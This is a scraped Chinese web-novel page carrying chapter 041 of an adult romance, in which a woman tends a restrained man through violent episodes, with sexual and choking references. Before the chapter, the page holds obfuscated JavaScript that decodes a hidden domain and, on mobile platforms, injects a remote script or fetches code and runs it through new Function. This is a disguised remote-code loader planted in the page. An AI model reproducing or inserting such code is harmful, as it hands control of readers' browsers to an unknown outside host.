98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

041喘息(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('041喘息

“对不起。”

“嗯?”

“弄哭你。”他抚摸白皙的长颈,指节在两处细腻的凹陷处流连,企图抚慰那已经消失的掐痕。

道歉迟了很久,但很有必要。

他们之间总有种默契,再大的分歧都可以抛到一边,若无其事地交谈。

她试图安慰:“那只是流眼泪,掐得生理刺激而已。”

“那不是,我知道,你被我操哭的时候才是生理刺激。”

某种体力上的优越感让她不爽:“那是流眼泪!”

不解她突然的发飙,奚扬愣愣地承认:“是。”

“我去睡觉了。”精神放松下来她便开始打哈欠,她的房间就在隔壁,更多时候总在客厅沙发将就,总是怕错过什么。

他的失眠症愈发严重,偏偏一定要和她分开睡。

“你睡不好啊。”她摸着那眼下总是不散的青黑。

“我下手没轻重。”有了前车之鉴,他有点草木皆兵。

不欲听她多言,他径自躺好拉上被子:“快点去睡。”

接下来几天,状况总是时好时坏,几乎挑战身体极限的疲惫带给精神的压力是加倍的,他性情不定,变得多疑起来。

奚扬总在突然发作时喊她出去,支撑不住的时候命令她过去,她动作慢了点他都会神经质地呼喊:“快点快点让我看到你。”等到她进去时,手掌在重重捆绑之下将她扣得死紧,眉头皱得很深:“你太慢了你太慢了你太慢了!”眼神阴鸷,变换腔调重复很多遍。

等他发泄一会儿,她舐掉他脸侧干涸的泪痕:“对不起。”

嘴角温柔的弧度让他别过头,他双手被绑着无法回抱,眼神恢复平静但依旧低落。

他长腿岔开,晚栀也算置身于他的怀抱,柔软的舌从他嘴角的擦伤舔舐到下巴,一路向下,停在锁骨啃咬,唇舌的取悦带着动物般的安慰。

他睁着依旧发红的眼自嘲:“难得你这么勾引我。”

昏天黑地的某一天,她惺忪睁眼,被一双直勾勾的黑眸怔住,他不知道在床边呆了多久,她放松一笑:“是你啊。”

奚扬偏过脸,感受温暖的抚触:“知不知道我有多爱你啊。”

“你永远不会知道。”薄唇吐出的气音浅淡。

这不公平啊,太他妈不公平了。

她抚摸他唇角浅淡的弧度:“每个灵魂都是平等的,至少精神上是。”

“不。”他淡淡道,莫测地回视,“不是。”

她保持仰头的姿势:“我爱你。”奚扬低头认命般轻笑,那笑里包含深深叹息。

他眼里的宿命感让她想亲吻,并且也这么做了。

黑眸顺从地闭上,是臣服。

粉唇吻上凉薄的眼,是爱惜。

他享受着喘息片刻里、珍贵的爱抚。

记起最初,只是觉得她被命运扼住咽喉,徐徐喘息的样子很迷人。

只因那自不量力的样子太迷人。

好像也没必要再计较了。

和解来得后知后觉。

是心悦诚服,是甘之如饴。

短暂的温情之后,隔天一大早便开始地狱般的大起大落。

晚栀在清晨被一阵破碎声惊醒,尽管他们已经封住阳台,但一想到大面落地窗她几乎跳起来,幸好只是马克杯。

“啊!啊!啊……”奚扬正歇斯底里地叫喊、摔东西。

他整个人陷入强烈的错乱当中,骂人都捋不直舌头,脏话说得含糊不清。

晚栀知道全是含“F”开头的字眼,骂过无数遍、也忍耐无数遍。

两个大汉一起将他拉住,他疯狂的扭头试图摆脱掣肘:“走开!走开!”晚栀站在一边,旁观整个过程。

十一看她这次都没精神收拾脚边搭配的杯子,只睁着眼看着一处,不忍道:“不如……”

淡漠的眉眼终于转过来,冷硬地止住他的话头:“Shut!Up!”

“Sorry.”心知自己紧绷得太厉害,晚栀主动道歉。

被震住的十一心下唏嘘,也许连她自己都没察觉,刚才的神态像极了床上那位。

为了防止他咬伤自己,晚栀找到毛巾,想塞在他嘴里。

他紧握着拳头,低着头:“出去,求你。”

“咬住,我出去。”她知道他五官又开始失控了,这死要面子的人啊。

晚栀隔着房门坐在地上,抱膝盖听着那边痛苦的闷声低吟。

等到房门终于打开,十一他们从里面出来,她动了动早已麻木的腿。

床角的人抱着腹部蜷缩在一起,带磨损的一堆绳子扔在旁边。

她脱掉鞋子,钻进去拥抱他。

静静陪他从浑身抽搐到短暂平复,用热毛巾帮他擦完身体时他的喘息渐渐平缓下来。

“我弄的?”他一只手绕到背后,她的视线全在他磨破许多痕迹的手腕上。

“嗯?”冰凉的指尖轻按在她肩后一块发紫的肌肤上,在白皙的肌肤上犹显突兀,她转过去发现看不到:“我经常自己磕伤。”

他另一只手来回扶平她的眉头,眨眼的速度慢下来,迷蒙间笃定道:“我弄的。”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间